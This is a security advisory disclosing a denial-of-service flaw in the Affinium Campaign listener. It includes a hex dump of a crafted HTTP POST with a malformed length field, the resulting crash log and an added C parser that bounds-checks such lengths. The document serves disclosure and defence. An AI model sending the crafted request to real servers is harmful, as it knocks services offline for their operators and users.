aflistenerdos-08_007.txt
Posted Jul 31, 2008
Authored by mu-b, Tim Brown | Site portcullis-security.com

Affinium Campaign version 7.2.1.0.55 suffers from a denial of service vulnerability in its Listener.

tags | exploit, denial of service
SHA-256 | 409f174deb2734fb33455f715be458ca7771b4452e3a584a4fd9708637195cb7

Portcullis Security Advisory - 08-007


Vulnerable System:

Affinium Campaign


Vulnerability Title:

The listener is vulnerable to Denial of Service.


Vulnerability Discovery And Development:

Portcullis Security Testing Services.


Credit For Discovery:

Neil Kettle and Tim Brown - Portcullis Computer-Security Ltd.


Affected systems:

All known versions of Affinium Campaign; the vulnerability discovered was for version 7.2.1.0.55.

Details:

Whilst it was not possible to confirm the exact nature of the vulnerability, it is believed that on connecting to the listener server a four byte length value is accepted which is used in calculations relating to memory allocation. By specifying an invalid value for this, the server fails when allocating/accessing memory. Note: in reproducing this, connections were spawned which each sent a four byte value that was incremented on every connection until the server crashed.

Similar issues can also be triggered from the web application which is typically deployed in front of the listener server. In this case the application makes use of an ActiveX control which encapsulates binary data within an HTTP POST request to http://webserver/Campaign/CampaignListener. Since the CampaignListener web page is expecting binary data, no attempt to validate the input is made prior to passing it to the listener server. It was identified that length encoding was again used and, as with the direct connection, manipulation of these length fields could affect memory allocation. By specifying invalid two byte length values, for instance, the server can be made to fail when allocating memory, as in the following request:

00000000 50 4f 53 54 20 2f 43 61 6d 70 61 69 67 6e 2f 43 |POST /Campaign/C|
00000010 61 6d 70 61 69 67 6e 4c 69 73 74 65 6e 65 72 3f |ampaignListener?|
00000020 43 6c 69 65 6e 74 49 44 3d 35 20 48 54 54 50 2f |ClientID=5 HTTP/|
00000030 31 2e 31 0d 0a 48 6f 73 74 3a 20 77 65 62 73 65 |1.1..Host: webse|
00000040 72 76 65 72 0d 0a 43 6f 6f 6b 69 65 3a 20 43 41 |rver..Cookie: CA|
00000050 4d 50 41 49 47 4e 53 45 53 53 49 4f 4e 49 44 3d |MPAIGNSESSIONID=|
00000060 48 56 73 62 47 35 70 6e 44 37 52 6c 79 67 6e 43 |HVsbG5pnD7RlygnC|
00000070 38 64 74 4e 56 50 76 50 43 51 56 57 32 37 78 54 |8dtNVPvPCQVW27xT|
00000080 4c 63 76 79 36 51 57 63 51 51 4c 51 32 51 52 52 |Lcvy6QWcQQLQ2QRR|
00000090 46 56 57 76 21 31 33 36 34 35 35 34 39 33 34 0d |FVWv!1364554934.|
000000a0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a |.Content-Length:|
000000b0 20 32 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 | 296..Content-Ty|
000000c0 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f |pe: multipart/fo|
000000d0 72 6d 2d 64 61 74 61 0d 0a 0d 0a 1f 01 00 00 01 |rm-data.........|
000000e0 00 02 07 0c 00 00 00 01 01 00 00 00 03 00 00 00 |................|
000000f0 12 0c 00 00 00 75 6e 69 63 61 5f 61 63 73 76 72 |.....unica_acsvr|
00000100 00 12 73 00 00 00 2f 61 70 70 73 2f 75 6e 69 63 |..s.../apps/unic|
00000110 61 2f 61 66 66 69 6e 69 75 6d 2f 41 66 66 69 6e |a/affinium/Affin|
00000120 69 75 6d 2f 43 61 6d 70 61 69 67 6e 2f 70 61 72 |ium/Campaign/par|
00000130 74 69 74 69 6f 6e 73 2f 70 61 72 74 69 74 69 6f |titions/partitio|
00000140 6e 31 2f 63 61 6d 70 61 69 67 6e 73 2f 41 41 41 |n1/campaigns/AAA|
00000150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
*
00000170 41 41 41 41 41 41 41 41 00 04 2a 00 00 00 0e f2 |AAAAAAAA..*....ò|
00000180 95 47 51 57 f2 00 00 00 00 00 14 00 00 00 01 29 |.GQWò..........)|
00000190 d5 1b 4f 5f 75 72 f9 00 66 3c 62 8a b8 d6 c3 a6 |Õ.O_urù.f<b.¸Öæ|
000001a0 4f 63 00 00 00 00 00 00 12 0b 00 00 00 70 61 72 |Oc...........par|
000001b0 74 69 74 69 6f 6e 31 00 12 00 00 00 00 12 0e 00 |tition1.........|
000001c0 00 00 31 32 30 31 30 30 37 38 37 31 32 39 38 00 |..1201007871298.|
000001d0 05 01 00 00 00 00 00 00 00 05 01 00 00 00 00 00 |................|
000001e0 00 00 05 01 00 00 00 02 00 00 00 12 03 00 00 00 |................|
000001f0 2d 6c 00 12 06 00 00 00 65 6e 5f 55 53 00 41 41 |-l......en_US.AA|
00000200 d3 4d 00 0d 0a |ÓM...|

The status log included the following line detailing the Denial of Service:

01/22/2008 13:48:13.220 [E] [MEMORY] SBRK value: 20ab2d50; _end: 200a2974; difference: 10552284 [hmem:2101]
01/22/2008 13:48:13.220 [E] [MEMORY] OUT OF MEMORY: Unable to REALLOCATE 1305706496 bytes. [hmem:2404]

1305706496 is 0x4dd38000 in hexadecimal. Once endian and encoding issues have been accounted for, the top two bytes correspond to our invalid two byte length value of 0xd34d (see offset 0x200 in the dump above).
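The dump above appears to carry string records of the form type byte 0x12, four byte little-endian length, NUL-terminated text ("unica_acsvr", "partition1", "-l", "en_US"). The following is an added example, not Affinium code: a parser for that record shape that checks every length against a policy cap and against the bytes actually received before any copy or allocation, which is the check whose absence the log line illustrates. The record layout is inferred from the dump and the 4096 byte cap is an assumed limit; the same bounds check applies to the four byte length accepted on a direct listener connection.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define REC_STRING     0x12   /* type byte seen before each string in the dump */
#define MAX_STRING_LEN 4096u  /* assumed policy cap; the server applied none */

/* Little-endian uint32, the byte order used by the length fields in the dump. */
static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Parse one string record (0x12, LE32 length, NUL-terminated bytes) from
 * buf[0..avail). Copies the string to out and returns bytes consumed, or 0
 * if the record is malformed, so a client-chosen length never reaches
 * the allocator. */
size_t parse_string_record(const uint8_t *buf, size_t avail,
                           char *out, size_t outsz) {
    if (avail < 5 || buf[0] != REC_STRING) return 0;   /* no full header */
    uint32_t len = le32(buf + 1);
    if (len == 0 || len > MAX_STRING_LEN) return 0;     /* policy cap first */
    if (len > avail - 5) return 0;                      /* must fit what arrived */
    if (len > outsz) return 0;                          /* must fit the caller */
    if (buf[5 + len - 1] != '\0') return 0;             /* must be NUL-terminated */
    memcpy(out, buf + 5, len);
    return 5 + (size_t)len;
}

/* Number of records accepted before the first rejection. */
size_t count_valid_records(const uint8_t *buf, size_t len) {
    char tmp[MAX_STRING_LEN];
    size_t off = 0, n = 0;
    for (;;) {
        size_t used = parse_string_record(buf + off, len - off, tmp, sizeof tmp);
        if (used == 0) return n;
        off += used;
        n++;
    }
}

/* Constructed sample: "unica_acsvr" and "-l" records copied from the dump,
 * then a record whose length field is 0x4dd38000, the realloc size in the log. */
const uint8_t SAMPLE[] = {
    0x12, 0x0c, 0, 0, 0, 'u','n','i','c','a','_','a','c','s','v','r', 0,
    0x12, 0x03, 0, 0, 0, '-','l', 0,
    0x12, 0x00, 0x80, 0xd3, 0x4d, 0
};
const size_t SAMPLE_LEN = sizeof SAMPLE;
```

The first two records are accepted and the third is rejected at the cap check, before its 1305706496 byte length can be turned into a realloc request.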


Impact:

An attacker would be able to cause a Denial of Service.


Exploit:

Exploit code is not required.

Vendor Status:

05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches


Copyright:

Copyright © Portcullis Computer Security Limited 2008, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.


Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
